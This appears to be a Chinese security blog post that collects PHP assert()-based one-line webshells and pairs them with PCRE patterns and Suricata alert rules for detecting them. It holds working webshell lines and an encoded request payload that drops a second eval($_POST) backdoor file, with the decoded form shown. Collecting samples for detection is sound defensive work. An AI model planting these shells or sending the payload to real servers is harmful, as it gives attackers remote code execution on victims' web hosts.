引言
收集PHP一句话木马 assert() websell,并提供相应的检测方法。
案例
1、<?php $_GET['a']($_GET['b']);?>
<?php $_POST['a']($_GET['b']);?>
<?php $_POST['a']($_POST['b']);?>
<?php $_GET['a']($_POST['b']);?>
?a=assert&b=phpinfo()
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
解码后:a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};
Windows会提示警告错误,而且7.2以上禁用了一些动态函数。
Linux 不管成功还是失败无任何返回
正则匹配
pcre:"/GET\x20(\/[a-zA-Z0-9%_\/\-~]*)?\.php[\S]*=assert[^a-z][\s\S]*HTTP\/\d\.\d\x20200/i" Webshell.Assert.Http_Request.A
pcre:"/POST\x20(\/[a-zA-Z0-9%_\/\-~]*)?\.php[\S\s]*\x0d\x0a[\S]*=assert[h\s&][\s\S]*HTTP\/\d\.\d\x20200/i" Webshell.Assert.Http_Body.A
alert http any any -> any any (msg:"WebShell.PHP.Assert().Threat.A"; flow:to_server,established; content:"GET"; nocase; http_method; content:".php?"; nocase; http_uri; content:"=assert"; http_uri; fast_pattern; nocase; pcre:"/\.php\?[\S\s]*=assert[^a-z]/Ui"; reference:url,https://mp.csdn.net/mdeditor/88645526; classtype:web-application-attack; sid:70000000; rev:1; metadata:created_at 2019_03_19, updated_at 2019_03_19;)
alert http any any -> any any (msg:"WebShell.PHP.Assert().Threat.B"; flow:to_server,established; content:"POST"; nocase; http_method; content:".php"; nocase; http_uri; content:"=assert"; http_client_body; fast_pattern; nocase; pcre:"/=assert[&]?$/Pi"; reference:url,https://mp.csdn.net/mdeditor/88645526; classtype:web-application-attack; sid:70000001; rev:1; metadata:created_at 2019_03_19, updated_at 2019_03_19;)
文件:"/2018 - Work/研究测试-2019/PHP/assert/1/assert_Windows-PHP-5.5.pcap"